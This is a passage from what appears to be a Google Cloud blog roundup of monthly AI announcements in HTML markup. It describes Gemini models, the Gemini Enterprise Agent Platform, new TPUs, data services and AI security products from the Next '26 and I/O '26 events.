&lt;h3&gt;&lt;strong style="vertical-align: baseline;"&gt;Top announcements&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Introducing Google AI Threat Defense to help you outpace the adversary: &lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;Google Cloud is introducing a comprehensive AI-powered cybersecurity solution — Google AI Threat Defense — an always-on autonomous security platform. Learn more &lt;/span&gt;&lt;a href="https://cloud.google.com/blog/products/identity-security/introducing-google-ai-threat-defense?e=48754805"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;here&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;.&lt;/span&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;ul&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Gemini 3.5:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; Our latest family of models combines frontier intelligence with action – starting with Gemini 3.5 Flash. &lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Gemini Omni:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; Our new model is a leap forward in world understanding, multimodality, and editing, letting you generate any output from any input, starting with video. &lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Google Antigravity: &lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;Google Antigravity’s expanded capabilities and new integration with Agent Platform bring agentic development to your entire organization.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Gemini Spark: &lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;For Gemini Enterprise and Workspace customers, Gemini Spark is your 24/7 personal AI agent that helps you work more efficiently by autonomously taking action on your behalf, under your direction. &lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Google Workspace: &lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;Google Pics, our new image generation and editing tool, and new voice features in Gmail, Docs and Keep, help reimagine how you work.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Managed Agents API on Agent Platform:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; Allows developers to build and run custom agents inside secure, Google-hosted environments that seamlessly integrate with Agent Platform.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;CodeMender:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; A powerful AI security agent provided through Agent Platform, CodeMender can help find and fix vulnerabilities in your code.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Nano Banana 2 and Nano Banana Pro are generally available: &lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;Available today via Gemini Enterprise Agent Platform, organizations are already putting the models to work. Learn more &lt;/span&gt;&lt;a href="https://cloud.google.com/blog/products/ai-machine-learning/nano-banana-2-and-nano-banana-pro-are-generally-available?e=48754805"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;here&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;. &lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;&lt;strong style="vertical-align: baseline;"&gt;Thought leadership (editor’s pick): &lt;/strong&gt;&lt;/h3&gt;
&lt;ul&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Cloud CISO Perspectives: How Google + Wiz changes multicloud strategy for CISOs: &lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;Vinod D’Souza, director, Office of the CISO, shares highlights from his RSA Conference fireside chat with Anthony Belfiore, chief strategy officer, Wiz. While threat actors have seen gains from the adversarial misuse of AI, Google and Wiz are tackling these challenges head-on by combining Wiz's deep cloud telemetry with Google's world-class AI and quantum research to help CISOs and their organizations meet the needs of the agentic enterprise era. Read more &lt;/span&gt;&lt;a href="https://cloud.google.com/blog/products/identity-security/cloud-ciso-perspectives-how-google-wiz-changes-multicloud-strategy-for-cisos?e=48754805"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;here&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;&lt;strong style="vertical-align: baseline;"&gt;News you can use: &lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;What Google I/O '26 means for developing agents on Google Cloud: &lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;Dig deep into how Gemini Enterprise Agent Platform and the new developer tools shared at I/O fit together, unpack the spectrum of choice for building, and share what we’d actually try first. Learn more &lt;/span&gt;&lt;a href="https://cloud.google.com/blog/topics/developers-practitioners/io26-news-for-agent-developers-on-google-cloud?e=48754805"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;here&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;.&lt;/span&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Five must-have guides to move agents into production with Gemini Enterprise Agent Platform:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; Here is a look back at our five-part series covering the architecture patterns and best practices you need to move your agents into production. Learn more &lt;/span&gt;&lt;a href="https://cloud.google.com/blog/topics/developers-practitioners/five-guides-to-building-and-scaling-production-ready-ai-agents?e=48754805"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;here&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;How to build an AI-ready security program for the public sector:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; From industrial control systems to decades-old municipal databases, here’s our CISO guidance to prep AI-ready security programs for the public sector. Learn more &lt;/span&gt;&lt;a href="https://cloud.google.com/blog/products/identity-security/cloud-ciso-perspectives-how-to-build-an-ai-ready-security-program-for-the-public-sector"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;here&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Stay tuned for monthly updates on Google Cloud’s AI announcements, news, and best practices. For a deeper dive into the latest from Google Cloud customers, read our monthly recap, &lt;/span&gt;&lt;a href="https://cloud.google.com/blog/topics/customers/cool-stuff-google-cloud-customers-built-monthly-round-up?e=48754805"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Cool stuff customers built. &lt;/span&gt;&lt;/a&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;hr /&gt;
&lt;h2 style="text-align: center;"&gt;&lt;span style="vertical-align: baseline;"&gt;April&lt;/span&gt;&lt;/h2&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;We hosted &lt;/span&gt;&lt;a href="https://cloud.google.com/blog/topics/google-cloud-next/welcome-to-google-cloud-next25?e=48754805"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Google Cloud Next&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; in Las Vegas on April 22, announcing incredible innovations from Gemini Enterprise Agent Platform to our eight-generation TPUs. We also expanded the Gemini Enterprise app in collaborative ways – now, with new features like Projects, you can work side-by-side with your agents and colleagues. &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;If you missed the livestream, take a look at our &lt;/span&gt;&lt;a href="https://cloud.google.com/blog/topics/google-cloud-next/next26-day-1-recap"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Day 1 recap&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;. It’s been incredible to see how customers have been applying AI in thousands of ways — so far, we’ve counted &lt;/span&gt;&lt;a href="https://cloud.google.com/transform/101-real-world-generative-ai-use-cases-from-industry-leaders?e=48754805"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;more than 1,300 examples&lt;/span&gt;&lt;/a&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;. &lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;&lt;span style="vertical-align: baseline;"&gt;Top announcements&lt;/span&gt;&lt;/h3&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;1. Gemini Enterprise Agent Platform: &lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;Our new, comprehensive platform to build, scale, govern, and optimize agents. Moving forward, all Vertex AI services and roadmap evolutions will be delivered exclusively through the Agent Platform, rather than as a standalone service, to power the next generation of agent development. &lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;The platform is designed around four core pillars — &lt;/span&gt;&lt;strong style="vertical-align: baseline;"&gt;build, scale, govern, and optimize&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; —&lt;/span&gt;&lt;strong style="vertical-align: baseline;"&gt; &lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;that allow teams to collaborate seamlessly. Learn more about Agent Platform &lt;/span&gt;&lt;a href="https://cloud.google.com/blog/products/ai-machine-learning/introducing-gemini-enterprise-agent-platform"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;here&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;.&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-image_full_width"&gt;






  
    &lt;div class="article-module h-c-page"&gt;
      &lt;div class="h-c-grid"&gt;
  

    &lt;figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      "&gt;

      
      
        
        &lt;img alt="1 gemini enterprise agent platform" src="https://storage.googleapis.com/gweb-cloudblog-publish/images/1_0_gemini_enterprise_agent_platform.max-1000x1000.jpg" /&gt;
        
        &lt;/a&gt;
      
    &lt;/figure&gt;

  
      &lt;/div&gt;
    &lt;/div&gt;
  




&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;2. Gemini Enterprise&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; &lt;/span&gt;&lt;strong style="vertical-align: baseline;"&gt;app&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; has all the key components to let teams discover, create, share, and run AI agents in a single environment. At Next ‘26, we introduced &lt;/span&gt;&lt;a href="https://cloud.google.com/blog/products/ai-machine-learning/whats-new-in-gemini-enterprise"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;several new capabilities&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; in the Gemini Enterprise app:&lt;/span&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Agent Designer &lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;uses the same no-code agent designer experience of Agent Platform and lets employees build sophisticated schedule- and trigger-based agents using any enterprise connector. It gives you a virtual flowchart of your agent, allowing you to inspect, test, and approve workflows, ensuring total transparency for executing critical business processes.  &lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Long-running agents &lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;are&lt;/span&gt;&lt;strong style="vertical-align: baseline;"&gt; &lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;designed to execute complex business processes. They can work autonomously in secure cloud sandboxes, giving agents the ability to orchestrate business logic, write code to build custom tools, and complete multi-step work like reconciliation activities or sales prospect sequencing — without needing constant prompting. &lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Inbox in Gemini Enterprise &lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;provides a central location to monitor, guide, and help manage all of your agent activity, including your long-running agents. Notifications are intuitively categorized into actionable groups like "Needs your input," "Errors," and "Completed.” &lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Projects &lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;create a dedicated space where the agent’s memory is confined to the files and conversations your team adds. By connecting it to data sources including Google Drive, NotebookLM, and Google Group Chats, the agent becomes an expert on a specific topic and can provide team members daily briefings or status updates without digging through months of documents.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Skills &lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;create simple shortcuts using an “@” mention for repetitive tasks such as applying brand guidelines, formatting a report, and accessing specific data.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Canvas &lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;gives our customers an interactive editor &lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;directly within Gemini Enterprise. It allows teams to easily create and edit Docs and Slides, and even export to Microsoft 365 files, within the same experience. &lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Agent Gallery &lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;provides access to &lt;/span&gt;&lt;a href="https://cloud.google.com/blog/products/ai-machine-learning/partner-built-agents-available-in-gemini-enterprise?e=48754805"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;third-party agents&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; &lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;from partners like Adobe, Atlassian, Lovable, and ServiceNow, and is adding more third-party connectors for Asana, Mailchimp, Workday, and more. These integrations enable your agents to retrieve data and execute tasks with your systems-of-record. &lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;3. AI Hypercomputer: &lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;Designed specifically for demanding AI workloads, our AI Hypercomputer is an advanced, purpose-built architecture that unites performance-optimized hardware for compute, storage, networking, open software and machine learning frameworks — as well as flexible consumption models — into a single, integrated system. We are &lt;/span&gt;&lt;a href="https://cloud.google.com/blog/products/compute/ai-infrastructure-at-next26"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;announcing&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; innovations at every layer of the AI Hypercomputer:&lt;/span&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong style="vertical-align: baseline;"&gt;TPU 8t, optimized for training, &lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;uses breakthrough Inter-Chip Interconnect (ICI) technology to scale up to 9,600 TPUs and 2 PB of shared, high-bandwidth memory in a single superpod. It achieves 3x the processing power of Ironwood and delivers up to 2x more performance/Watt. &lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;strong style="vertical-align: baseline;"&gt;TPU 8i, optimized for inference, &lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;uses our new Boardfly topology to directly connect 1,152 TPUs in a single pod. It features 3x more on-chip SRAM compared to previous versions to host larger KV caches entirely on-silicon and integrates a specialized Collectives Acceleration Engine. Taken together, TPU 8i delivers 80% better performance per dollar for inference than the prior generation, &lt;/span&gt;&lt;a href="https://cloud.google.com/blog/products/compute/tpu-8t-and-tpu-8i-technical-deep-dive"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;enabling millions of concurrent agents to run cost-effectively&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;.&lt;/span&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;4. The Agentic Data Cloud: &lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;A new data architecture built for the speed and scale of agentic AI. The Agentic Data Cloud delivers an AI-native architecture, allowing agents to perceive, reason, and act on your behalf in real-time, including: &lt;/span&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Cross-Cloud Lakehouse, &lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;standardized on Apache Iceberg, is our Lakehouse that enables you to leave your data in AWS or Azure (coming later this year) while querying it instantly — without the friction of vendor lock-in or the cost of data movement&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Knowledge Catalog &lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;constructs a unified, dynamic context graph of your entire business enabling you to ground agents in all of your business data and semantics. With Smart Storage and the Object Context API, files in Google Cloud Storage are instantly tagged and enriched with metadata before an agent touches them. Then our Knowledge Engine uses Gemini to autonomously tag, define logic and instantly map complex relationships across your entire enterprise, providing the semantic definition your agents have been missing. &lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;5. Protecting the agentic enterprise: Security built for the AI era.&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; Our full-stack AI approach, from the chips to the models, gives you a competitive advantage with better integration and velocity to help protect customers. Not only can Google action insights from the world’s largest threat observatory and Mandiant frontline experts, but we also bring cutting-edge insights and breakthroughs from Google DeepMind, to help make your platforms more secure.&lt;/span&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong style="vertical-align: baseline;"&gt;Agentic defense&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;: Three new agents in Google Security Operations can help &lt;/span&gt;&lt;strong style="vertical-align: baseline;"&gt;hunt threats&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;, &lt;/span&gt;&lt;strong style="vertical-align: baseline;"&gt;engineer detections&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;, and &lt;/span&gt;&lt;strong style="vertical-align: baseline;"&gt;provide context on third parties&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;. You can build your own security agents with &lt;/span&gt;&lt;strong style="vertical-align: baseline;"&gt;remote Google Cloud model context protocol (MCP) server support&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; for Google Security Operations, now generally available. You can also access the MCP server client directly from the Google Security Operations &lt;/span&gt;&lt;strong style="vertical-align: baseline;"&gt;chat interface&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;, available in preview.&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;strong style="vertical-align: baseline;"&gt;Protecting AI and cloud apps across any infrastructure with Wiz&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;: Newly expanded AI coverage helps build secure agents across clouds and AI studios. New AI-Bill of Materials in development tools can help secure AI-generated code and mitigate the &lt;/span&gt;&lt;a href="https://cloud.google.com/transform/these-4-ai-governance-tips-help-counter-shadow-agents"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;risk of shadow AI&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;. &lt;/span&gt;&lt;a href="https://wiz.io/blog/wiz-at-google-cloud-next" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Learn more&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;.&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;strong style="vertical-align: baseline;"&gt;Securing agents and the agentic web&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;: Model Armor can integrate with Agent Gateway, and new Agent Identities provide more layers of defense against shadow AI. &lt;/span&gt;&lt;a href="https://cloud.google.com/blog/products/identity-security/introducing-google-cloud-fraud-defense-the-next-evolution-of-recaptcha"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Google Cloud Fraud Defense&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;, the next evolution of reCAPTCHA, offers agent-specific capabilities that can help secure the agentic web as well as the entire user and customer journey.   &lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;strong style="vertical-align: baseline;"&gt;Trusted Cloud&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;: We’re simplifying permissions with modern IAM, and advancing Google Cloud security with new capabilities in Security Command Center plus new innovations in data and network security.&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;strong style="vertical-align: baseline;"&gt;New partner-supported workflows for Google Security Operations&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;: This new robust cohort of &lt;/span&gt;&lt;a href="https://cloud.google.com/blog/products/identity-security/next26-announcing-new-partner-supported-workflows-for-google-security-operations"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;partner integrations&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; includes partners developing their own agentic security operations centers (SOCs).&lt;/span&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;You can catch up on all our &lt;/span&gt;&lt;a href="https://cloud.google.com/blog/products/identity-security/next26-redefining-security-for-the-ai-era-with-google-cloud-and-wiz"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;security announcements from Next ‘26 here&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;. &lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;&lt;span style="vertical-align: baseline;"&gt;News you can use &lt;/span&gt;&lt;/h3&gt;
&lt;ul&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;a href="https://cloud.google.com/blog/products/ai-machine-learning/gemini-3-1-flash-tts-on-google-cloud?e=48754805"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;&lt;strong&gt;Guide to prompting Gemini 3.1 Flash TTS (text-to-speech)&lt;/strong&gt;&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;: &lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;The new TTS model introduces a high level of controllability by allowing you to steer the delivery using more than 200 audio tags. We'll share how to get strong results from the model, whether you are building accessible gaming soundtracks, banking systems, or audiobooks. Learn more about the model &lt;/span&gt;&lt;a href="https://blog.google/innovation-and-ai/models-and-research/gemini-models/gemini-3-1-flash-tts/" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;here&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;. &lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;a href="https://cloud.google.com/blog/products/ai-machine-learning/ultimate-prompting-guide-for-lyria-3-pro?e=48754805"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;&lt;strong&gt;Ultimate prompting guide for Lyria 3 models&lt;/strong&gt;&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;: &lt;/span&gt;&lt;a href="https://deepmind.google/models/lyria/" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Lyria 3&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;, &lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;Google's family of music-generation models, is designed to give you granular control over vocals, instrumentation, and arrangement. So we spent weeks testing against every musical genre and use case we could imagine. We put together this guide to share exactly what we learned and how you can get the best results.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;a href="https://cloud.google.com/blog/products/ai-machine-learning/build-a-robust-and-cost-effective-gen-ai-strategy?e=48754805"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;&lt;strong&gt;How to find the sweet spot between cost and performance&lt;/strong&gt;&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;: This guide will walk you through Google Cloud's flexible gen AI infrastructure options, showing you how to find that sweet spot on the efficient frontier between cost and performance. We'll start with the foundational pay-as-you-go (PayGo) models and then explore how to layer on more specialized options to build a robust and cost-effective gen AI strategy.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;a href="https://cloud.google.com/blog/products/identity-security/essential-ai-and-cloud-security-now-on-by-default"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;&lt;strong&gt;Essential AI and cloud security now on by default&lt;/strong&gt;&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;: To support the next generation of AI innovators, we are offering on by default essential AI security and cloud security in Security Command Center Standard. &lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong&gt;&lt;a href="https://cloud.google.com/blog/products/identity-security/securing-ai-inference-on-gke-with-model-armor"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Securing AI inference on GKE with Model Armor&lt;/span&gt;&lt;/a&gt;&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;: Here’s how to secure AI inference on Google Kubernetes Engine with Model Armor and high-performance storage.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;a href="https://cloud.google.com/blog/products/identity-security/cloud-ciso-perspectives-rsac-26-ai-security-and-workforce-of-the-future"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;&lt;strong&gt;Cloud CISO Perspectives: AI, security, and the workforce of the future&lt;/strong&gt;&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;: You can’t bring traditional security to an AI fight, so how do we defend against AI-powered attacks, boost defenders with AI, and secure AI use? Drop in on this RSA Conference fireside chat between Francis deSouza, Google Cloud COO and President, Security Products, and Nick Godfrey, senior director, Office of the CISO.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Stay tuned for monthly updates on Google Cloud’s AI announcements, news, and best practices. For a deeper dive into the latest from Google Cloud customers, read our monthly recap, &lt;/span&gt;&lt;a href="https://cloud.google.com/blog/topics/customers/cool-stuff-google-cloud-customers-built-monthly-round-up?e=48754805"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Cool stuff customers built.&lt;/span&gt;&lt;/a&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;hr /&gt;
&lt;h2 style="text-align: center;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;March&lt;/span&gt;&lt;/span&gt;&lt;/h2&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;March was a busy month for our AI teams. We launched Gemini Embedding 2, rolled out a highly cost-effective Veo 3.1 Lite model, and officially welcomed the Wiz team to Google Cloud to help redefine security in the AI era. &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Alongside these launches, we created comprehensive guides to help you get the most out of these models, from prompting formulas for Nano Banana 2, to practical advice for optimizing your TPU training. Here’s a quick look at the latest news and resources to help your team build what’s next.&lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;&lt;span style="vertical-align: baseline;"&gt;Top hits: &lt;/span&gt;&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://blog.google/innovation-and-ai/models-and-research/gemini-models/gemini-embedding-2/" rel="noopener" target="_blank"&gt;&lt;strong style="text-decoration: underline; vertical-align: baseline;"&gt;Gemini Embedding 2: Our first natively multimodal embedding model:&lt;/strong&gt;&lt;/a&gt;&lt;strong style="vertical-align: baseline;"&gt; &lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;Gemini Embedding 2 is our first natively multimodal embedding model that maps text, images, video, audio and documents into a single embedding space, enabling multimodal retrieval and classification across different types of media — and it’s available now in public preview.&lt;/span&gt;&lt;/li&gt;
